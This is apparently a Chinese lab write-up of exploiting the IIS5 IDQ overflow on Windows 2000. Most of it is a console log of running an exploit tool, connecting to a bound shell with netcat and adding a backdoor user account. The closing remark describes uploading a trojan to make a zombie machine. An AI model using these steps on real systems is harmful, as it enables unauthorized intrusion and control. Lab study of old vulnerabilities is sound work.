實驗:win2000 iisidq漏洞***

Microsoft Windows [版本 5.2.3790]
(C) 版權所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator>d:

D:\>cd iisidq

D:\IISidq>dir
 驅動器 D 中的卷沒有標籤。
 卷的序列號是 C461-74A9

 D:\IISidq 的目錄

2011-05-03  08:46    <DIR>          .
2011-05-03  08:46    <DIR>          ..
2001-07-24  13:34            16,384 IISIDQOverflowV2_Build0013.exe
2001-07-24  13:34            24,576 IISMiscOverflowV2_Build0013.exe
2001-07-24  13:37             1,281 ReadmeNow.txt
2001-09-23  09:56               506 ReadmNow.txt
               4 個文件         42,747 字節
               2 個目錄  8,274,116,608 可用字節

D:\IISidq>iisidq 0 192.168.191.128 80 1 521
'iisidq' 不是內部或外部命令，也不是可運行的程序
或批處理文件。

D:\IISidq>iisidqoverflowv2_build0013.exe
運行參數:  操作系統類型 目的地址 web端口 1 溢出監聽端口 <輸入命令1>
    或者:  操作系統類型 目的地址 web端口 2 溢出連接IP 溢出連接端口 <輸入命令1>

  其中,如果輸入命令參數沒有輸入,那麼,默認爲:"cmd.exe /c + dir"
  如果爲1,那麼,將輸入新的命令.

支持的操作系統 類型: ----
         0 -- IIS5中文Win2k Sp0
         1 -- IIS5中文Win2k Sp1
         2 -- IIS5中文Win2k Sp2
         3 -- IIS5 English Win2k Sp0
         4 -- IIS5 English Win2k Sp1
         5 -- --IIS5 English Win2k Sp2
         6 -- IIS5 Japanese Win2k Sp0
         7 -- IIS5 Japanese Win2k Sp1
         8 -- --IIS5 Japanese Win2k Sp2
         9 -- IIS5 Mexico Win2k
         10 -- --IIS5 Mexico Win2k sp1
         11 -- --IIS5 Mexico Win2k sp2

  IIS5 IDQ Overflow.v2.0 Build 0013 by snake.
              http://snake12.top263.net 2000/07

D:\IISidq>iisidq 0 192.168.191.128 80 1 521
'iisidq' 不是內部或外部命令，也不是可運行的程序
或批處理文件。

D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168.191.128 80 1 521
連接目的機器 192.168.191.128:80 OK.
發送shellcode 到 192.168.191.128:80 OK
 現在，如果系統類型正確,並且漏洞存在,那麼,應該 可以得到 [cmd.exe /c dir c:\] 結
果了...,good luck.!
D:\IISidq>cd..

D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
 驅動器 C 中的卷沒有標籤。
 卷的序列號是 64FE-4AEE

 c:\ 的目錄

2010-09-14  10:35       <DIR>          Documents and Settings
2010-09-14  10:29       <DIR>          Inetpub
2011-05-03  08:29       <DIR>          Program Files
2011-05-03  08:33       <DIR>          web
2011-05-03  08:42       <DIR>          WINDOWS
               0 個文件              0 字節
               5 個目錄  6,867,349,504 可用字節

D:\>dir
 驅動器 D 中的卷沒有標籤。
 卷的序列號是 C461-74A9

 D:\ 的目錄

2011-04-09  00:27         1,107,800 8uftp.exe
2011-04-11  15:54             1,549 8uftp.xml
2011-04-14  16:23    <DIR>          backup
2011-04-15  08:46    <DIR>          data
2011-04-21  09:20    <DIR>          fakeTasks.{D6277990-4C6A-11CF-8D87-00AA0060F
5BF}
2011-05-03  08:46    <DIR>          IISidq
2011-04-21  08:37             1,120 maxiangrui.rar
1996-07-26  08:39            45,568 nc.exe
2011-04-14  16:46    <DIR>          Program Files
2011-04-14  16:45        34,235,768 QQ2010.exe
2011-04-21  09:20    <DIR>          set.{21EC2020-3AEA-1069-A2DD-08002B30309D}
2011-04-20  08:29    <DIR>          sql
2011-03-27  10:32    <DIR>          vfp
2011-03-30  09:39    <DIR>          wy
2011-04-14  16:24    <DIR>          _user
2009-12-31  00:00         7,981,995 客戶端模擬練習版.exe
2011-04-12  08:21    <DIR>          聊天衝浪
               6 個文件     43,373,800 字節
              11 個目錄  8,274,067,456 可用字節

D:\>cd iidisq
系統找不到指定的路徑。

D:\>iisidq
'iisidq' 不是內部或外部命令，也不是可運行的程序
或批處理文件。

D:\>cd iisidq

D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168191.128 80 1 521 1

請輸入綁定的命令:cmd.exe
連接目的機器 192.168191.128:80 失敗.

D:\IISidq>IISIDQOverflowV2_Build0013.exe 0 192.168.191.128 80 1 521 1

請輸入綁定的命令:cmd.exe
連接目的機器 192.168.191.128:80 OK.
發送shellcode 到 192.168.191.128:80 OK
 現在，如果系統類型正確,並且漏洞存在,那麼,應該 可以得到 [cmd.exe] 結果了...,good
 luck.!
D:\IISidq>nc -v 192.168.191.128 521
'nc' 不是內部或外部命令，也不是可運行的程序
或批處理文件。

D:\IISidq>cd..

D:\>nc -v 192.168.191.128
 punt!: unknown socket error

D:\>nc -v 192.168.191.128
no port[s] to connect to

D:\>
D:\>cd..

D:\>
D:\>
D:\>
D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-1998 Microsoft Corp.

C:\WINDOWS\system32>

C:\WINDOWS\system32>
C:\WINDOWS\system32>net user maxr maxr123 /add
net user maxr maxr123 /add
命令成功完成。

 

C:\WINDOWS\system32>cd..
cd..

C:\WINDOWS>cd..
cd..

C:\>dir
dir
 驅動器 C 中的卷沒有標籤。
 卷的序列號是 64FE-4AEE

 C:\ 的目錄

2010-09-14  10:35       <DIR>          Documents and Settings
2010-09-14  10:29       <DIR>          Inetpub
2011-05-03  08:29       <DIR>          Program Files
2011-05-03  08:33       <DIR>          web
2011-05-03  08:42       <DIR>          WINDOWS
               0 個文件              0 字節
               5 個目錄  6,867,341,312 可用字節

C:\>cd web
cd web

後話：又看了一遍自己的實驗過程，發現思路還是最重要的，最後獲得了cmd .exe權限，基本上是什麼都可以做了，開啓tftp，上傳***，一個肉雞完成了，，，實驗的結果不是最終目的，都是比較老的漏洞，現在的2000基本上退出市面了吧，最重要還是思路和方法。整個***過程的想法纔是最寶貴的財富。